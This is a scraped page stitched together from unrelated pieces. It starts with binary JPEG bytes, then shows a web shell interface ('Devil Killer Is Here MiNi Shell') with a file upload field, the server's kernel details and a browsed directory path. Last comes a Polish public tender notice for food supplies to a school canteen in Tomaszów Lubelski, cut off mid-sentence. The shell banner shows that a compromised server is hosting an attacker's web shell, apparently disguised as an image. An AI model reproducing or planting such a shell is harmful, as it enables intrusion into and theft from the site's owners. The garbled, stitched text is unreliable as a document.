JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250811/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250811/0037053601-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> „Sukcesywna dostawa artykułów spożywczych do stołówki szkolnej <br/>przy Internacie Zespołu Szkół Techniczno-Zawodowych im. Macieja Rataja<br/>w Tomaszowie Lubelskim ul. Hallera 5 na rok szkolny 2025/2026” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ZESPÓŁ SZKÓŁ TECHNICZNO-ZAWODOWYCH IM.MACIEJA RATAJA W TOMASZOWIE LUBELSKIM</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000198516</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. gen. Józefa Hallera 5</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Tomaszów Lubelski</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">22-600</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL812 - Chełmsko-zamojski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@zstz-tl.edu.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://zstztomaszowlubelski.bip.lubelskie.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Zespół Szkół Techniczno-Zawodowych w Tomaszowie Lubelskim </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Sukcesywna dostawa artykułów spożywczych do stołówki szkolnej <br/>przy Internacie Zespołu Szkół Techniczno-Zawodowych im. Macieja Rataja<br/>w Tomaszowie Lubelskim ul. Hallera 5 na rok szkolny 2025/2026” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-8728531c-e7cf-4f40-96ee-7435782502ba</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00370536</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-08-11</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00082805/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 ,,Sukcesywna dostawa artykułów spożywczych do stołówki szkolnej przy Internacie Zespołu Szkół Techniczno-Zawodowych im. M. Rataja wTomaszowie Lubelskim w roku szkolnym 2025/2026&#39;&#39;.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://powiattomaszowski.ezamawiajacy.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://powiattomaszowski.ezamawiajacy.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">11.1.	W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym<br/> a Wykonawcami odbywa się przy użyciu Platformy zakupowej lub poczty elektronicznej - z zastrzeżeniem pkt 11.15.<br/>11.2.	Zamawiający wyznacza następujące osoby do kontaktu z Wykonawcami:<br/>Panią Monikę Strup tel. 84 6650505 wewn. 48 email. przetargi@zstz-tl.edu.pl<br/>11.3.	Oświadczenia, wnioski, zawiadomienia lub informacje, które wpłyną<br/>do Zamawiającego, uważa się za dokumenty złożone w terminie, jeśli ich czytelna treść dotrze do Zamawiającego przed upływem tego terminu. Za datę wpływu oświadczeń, wniosków, zawiadomień oraz informacji przekazywanym na adres<br/>e-mail Zamawiającego przyjmuje się datę zapisu wiadomości na serwerze odbiorczym. W przypadku skorzystania z Platformy za datę wpływu oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich rejestracji<br/>na Platformie.<br/>11.4.	Zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu na subdomenie Powiatu Tomaszowskiego: https://powiattomaszowski.ezamawiajacy.pl/,<br/>lub https://oneplace.marketplanet.pl.<br/>11.5.	Wykonawca po wybraniu opcji „Przystąp do postępowania” zostanie przekierowany do strony https://oneplace.marketplanet.pl, gdzie zostanie powiadomiony o możliwości zalogowania lub do założenia bezpłatnego konta. Wykonawca zakłada konto wykonując kroki procesu rejestracyjnego; podaje adres e-mail, ustanawia hasło, następnie powtarza hasło, wpisuje kod<br/>z obrazka, akceptuje regulamin, klika polecenie „zarejestruj się”.<br/>11.6.	Rejestracja Wykonawcy trwa maksymalnie do 2 dni roboczych. W związku<br/>z tym Zamawiający zaleca Wykonawcom uwzględnienie czasu niezbędnego na rejestrację w procesie złożenia Oferty w postaci elektronicznej.<br/>Wykonawca wraz z potwierdzeniem złożenia wniosku rejestracyjnego otrzyma informacje, o możliwości przyspieszenia procedury założenia konta, wówczas należy skontaktować się pod numerem telefonu podanym<br/> w ww. potwierdzeniu.<br/>11.7.	Po założeniu konta Wykonawca ma możliwość złożenia Oferty<br/>w postępowaniu. Komunikacja między Zamawiającym a Wykonawcami,<br/>w szczególności zawiadomienia oraz informacje, przekazywane są za pośrednictwem Platformy Zakupowej. Za datę przekazania zaświadczeń oraz informacji przyjmuje się datę ich wysłania za pośrednictwem zakładki „Korespondencja”.<br/>11.8.	Wykonawca może zwrócić się do Zamawiającego o wyjaśnienie treści SWZ. Wniosek należy przesłać za pośrednictwem Platformy Zakupowej przez opcję<br/>„Zadaj pytanie lub przy użyciu zakładki „Korespondencja”. W celu zadania pytania Zamawiającemu, Wykonawca klika lewym przyciskiem myszy klawisz ZADAJ PYTANIE. Powoduje to otwarcie okna, w którym należy uzupełnić dane Wykonawcy, temat i treść/przedmiot pytania, po wypełnieniu wskazanych pól wraz z wymaganym kodem weryfikującym z obrazka Wykonawca klika klawisz POTWIERDŹ, wykonawca uzyskuje potwierdzenie wysłania pytania poprzez komunikat systemowy &#34;Pytanie wysłane&#34;. Zamawiający udzieli wyjaśnień niezwłocznie, jednak nie później niż na 2 dni przed upływem terminu składania ofert, pod warunkiem, że wniosek o wyjaśnienie treści SWZ wpłynął do Zamawiającego nie później niż na 4 dni przed upływem terminu składania ofert. Jeżeli wniosek o wyjaśnienie treści SWZ wpłynie po upływie terminu, o którym mowa powyżej, lub dotyczy udzielonych wyjaśnień, Zamawiający może udzielić wyjaśnień albo pozostawić wniosek bez rozpoznania. Przedłużenie terminu składania ofert nie wpływa na bieg terminu składania wniosku o wyjaśnienie treści SWZ.<br/>11.9.	Treść pytań (bez ujawniania źródła zapytania) wraz z wyjaśnieniami bądź informacje o dokonaniu modyfikacji SWZ, Zamawiający przekaże Wykonawcom za pośrednictwem Platformy zakupowej.<br/>Pozostała treść znajduje się w rozdziale 11 SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1 z późn. zm.), dalej „RODO”, Zamawiający informuje, że:<br/>jest administratorem danych osobowych Wykonawcy oraz osób, których dane Wykonawca przekazał w niniejszym postępowaniu; dane osobowe Wykonawcy przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego na zadanie pn „Sukcesywna dostawa artykułów spożywczych do stołówki szkolnej przy Internacie Zespołu Szkół Techniczno-Zawodowych im. Macieja Rataja w Tomaszowie Lubelskim ul. Hallera 5 na rok szkolny 2025/2026”prowadzonym w trybie podstawowym;<br/>1)	odbiorcami danych osobowych Wykonawcy będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych (Dz. U. z 2024 r. poz. 1320 z późn. zm. ), dalej „ustawa Pzp”;<br/>2)	dane osobowe Wykonawcy będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, w sposób gwarantujący jego nienaruszalność;<br/>3)	obowiązek podania przez Wykonawcę danych osobowych bezpośrednio go dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp;<br/>4) w odniesieniu do danych osobowych Wykonawcy decyzje nie będą podejmowane<br/> w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>5) Wykonawca posiada:<br/>-na podstawie art. 15 RODO prawo dostępu do danych osobowych dotyczących Wykonawcy;<br/>- na podstawie art. 16 RODO prawo do sprostowania danych osobowych, o ile ich zmiana nie skutkuje zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie narusza integralności protokołu oraz jego załączników;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO; <br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy Wykonawca uzna, że przetwarzanie jego danych osobowych dotyczących narusza przepisy RODO;<br/>6)	Wykonawcy nie przysługuje:<br/>-w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>- prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania danych osobowych Wykonawcy jest art. 6 ust. 1 lit. c RODO.<br/><br/>Pozostała treść znajduje się w rozdziale 22 SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">W przypadku, gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 rozporządzenia 2016/679, wymagałoby niewspółmiernie dużego wysiłku, Zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego lub konkursu. Skorzystanie przez osobę, której dane dotyczą, z uprawnienia do sprostowania lub uzupełnienia danych osobowych, o którym mowa w art. 16 rozporządzenia 2016/679, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego lub konkursu ani zmianą postanowień umowy w zakresie niezgodnym z ustawą. Wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia publicznego lub konkursu. W przypadku danych osobowych zamieszczonych przez Zamawiającego w Biuletynie Zamówień Publicznych, prawa, o których mowa w art. 15 i art. 16 rozporządzenia 2016/679, są wykonywane w drodze żądania skierowanego do Zamawiającego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZSTZ.26.7.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">7</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ I – Pieczywo świeże <br/>1.	Bułka parówka	250g	szt.	200<br/>2.	Bułka razowa z ziarnami	50g	szt.	4000<br/>3.	Bułka tarta	1kg	szt.	120<br/>4.	Bułka zwykła	50g	szt.	4000<br/>5.	Cebularz	100g	szt.	300<br/>6.	Chleb razowy z ziarnami	500g	szt.	400<br/>7.	Chleb zwykły -mieszany	500g	szt.	2500<br/>8.	Drożdżówka	100g	szt.	2600<br/>9.	Makowiec	500g	szt.	40<br/>10.	Pączki z nadzieniem	80g	szt.	150<br/>11.	Pierożki z kapustą	60g	szt.	600<br/>12.	Pierożki z kaszą	60g	szt.	600<br/>13.	Rogal słodki/ czekolada	100g	szt.	200 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15000000-8 - Żywność, napoje, tytoń i produkty pokrewne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">10 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona oceny ofert, które nie zostały odrzucone, na podstawie następujących kryteriów oceny ofert dla każdej części oddzielnie:<br/>1	Cena (C)	60<br/>2	Termin realizacji zamówienia (T)	40<br/>Zamawiający dokona oceny ofert przyznając punkty w ramach poszczególnych kryteriów oceny ofert, przyjmując zasadę, że 1% = 1 punkt. <br/><br/>17.2. Kryterium „Cena” (C ) - 60% będzie rozpatrywana na podstawie ceny brutto danej części zamówienia, podanej przez Wykonawcę w ofercie.<br/>Ilość punktów w tym kryterium zostanie obliczona na podstawie poniższego wzoru: <br/> Cena min. (Cn)<br/>Cena(C) = ---------------------- x 60 pkt<br/> Cena Bad. of. (Cb)<br/>gdzie: <br/>C – ilość punktów za kryterium cena,<br/>Cn– cena brutto oferty najniższej spośród ofert nieodrzuconych, <br/>Cb – cena brutto oferty badanej oferty. <br/>Przyznane punkty zostaną zaokrąglone do dwóch miejsc po przecinku<br/>Maksymalna ilość punktów, jaką może uzyskać Wykonawca w kryterium cena – 60 pkt.<br/>17.3. Punkty za kryterium „Termin realizacji zamówienia’’ (T )- 40 % będą liczone w następujący sposób: <br/>	W kryterium „Termin realizacji zamówienia” oceniany będzie termin zadeklarowany przez Wykonawcę, zgodnie z poniższą tabelą. Oferty będą oceniane według następującego wzoru:<br/><br/>Lp.	Termin realizacji zamówienia	Liczba punktów<br/>1	W terminie 3 dni roboczych od dnia przekazania zamówienia telefonicznie lub e-mailem	00,00<br/>2.	W terminie 2 dni roboczych od dnia przekazania zamówienia telefonicznie lub e-mailem	20,00<br/>3	W terminie 1 dnia roboczych od dnia przekazania zamówienia telefonicznie lub e-mailem	40,00<br/><br/>T- ilość punktów za termin wykonania zamówienia.<br/>Zamawiający przyzna maksymalną ilość punktów tj. 40,00 (przy uwzględnieniu wagi wynoszącej 40,00%) Wykonawcy, który zaoferuje termin wykonania zamówienia 1 dnia od dnia przekazania zamówienia telefonicznie lub e-mailem.<br/>W pozostałych ofertach, punkty zostaną przekazane zgodnie z powyższą tabelą.<br/>UWAGA:<br/>Niepodanie w ofercie terminu realizacji dostaw będzie skutkowało uznaniem, że Wykonawca deklaruje termin dostaw – 3 dni robocze od dnia przekazania zamówienia telefonicznie lub e-mailem.<br/>Zaproponowanie terminu dłuższego lub innego niż określony w tabeli będzie skutkować odrzuceniem oferty jako niezgodnej z SWZ.<br/>17.4 Za najkorzystniejszą ofertę w danej części zamówienia zostanie uznana oferta, która otrzyma największą ilość punktów (O) obliczoną na podstawie wzoru:<br/> O= C+T<br/> Gdzie:<br/> O- łączna ilość punktów oferty ocenianej<br/> C- liczba punktów uzyskanych w kryterium „Cena”<br/> T – liczba punktów uzyskanych w kryterium „Termin realizacji zamówienia”</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ II – Produkty mięsne, wędliny <br/>1.	Boczek wędzony parzony-pasek	kg	50<br/>2.	Karkówka bez kości	kg	150<br/>3.	Kiełbasa biała	kg	50<br/>4.	Kiełbasa pieczona	kg	80<br/>5.	Kiełbasa szynkowa	kg	50<br/>6.	Kiełbasa wiejska	kg	100<br/>7.	Kiełbasa wieprzowa typu krakowska	kg	140<br/>8.	Kiełbasa zwyczajna	kg	100<br/>9.	Kości schabowe/karkowe –około 15 %-20% mięsa	kg	200<br/>10.	Kości wędzone	kg	50<br/>11	Łopatka bez kości -świeża	kg	1000<br/>12.	Mielonka wieprzowa- konserwowa ok. 70 % mięsa	kg	60<br/>13.	Parówki wieprzowe –ok. 92% mięsa	kg 130<br/>14.	Pasztet pieczony	kg	50<br/>15.	Pieczeń wieprzowa -pieczona	kg	50<br/>16.	Polędwica drobiowa	kg	100<br/>17.	Polędwica wieprzowa -typu sopocka	kg	100<br/>18.	Schab pieczony/wędlina	kg	100<br/>19.	Schab wieprzowy bez kości	kg	300<br/>20.	Szynka –wieprzowa –tradycyjna/wędlina	kg	300<br/>21.	Szynka wieprzowa-pieczona/wędlina	kg 300<br/>22.	Wątroba wieprzowa	kg	25<br/>23.	Żeberka wieprzowe mięsne-paski	kg	200 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15000000-8 - Żywność, napoje, tytoń i produkty pokrewne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15100000-9 - Produkty zwierzęce, mięso i produkty mięsne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">10 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona oceny ofert, które nie zostały odrzucone, na podstawie następujących kryteriów oceny ofert dla każdej części oddzielnie:<br/>1	Cena (C)	60<br/>2	Termin realizacji zamówienia (T)	40<br/>Zamawiający dokona oceny ofert przyznając punkty w ramach poszczególnych kryteriów oceny ofert, przyjmując zasadę, że 1% = 1 punkt. <br/><br/>17.2. Kryterium „Cena” (C ) - 60% będzie rozpatrywana na podstawie ceny brutto danej części zamówienia, podanej przez Wykonawcę w ofercie.<br/>Ilość punktów w tym kryterium zostanie obliczona na podstawie poniższego wzoru: <br/> Cena min. (Cn)<br/>Cena(C) = ---------------------- x 60 pkt<br/> Cena Bad. of. (Cb)<br/>gdzie: <br/>C – ilość punktów za kryterium cena,<br/>Cn– cena brutto oferty najniższej spośród ofert nieodrzuconych, <br/>Cb – cena brutto oferty badanej oferty. <br/>Przyznane punkty zostaną zaokrąglone do dwóch miejsc po przecinku<br/>Maksymalna ilość punktów, jaką może uzyskać Wykonawca w kryterium cena – 60 pkt.<br/>17.3. Punkty za kryterium „Termin realizacji zamówienia’’ (T 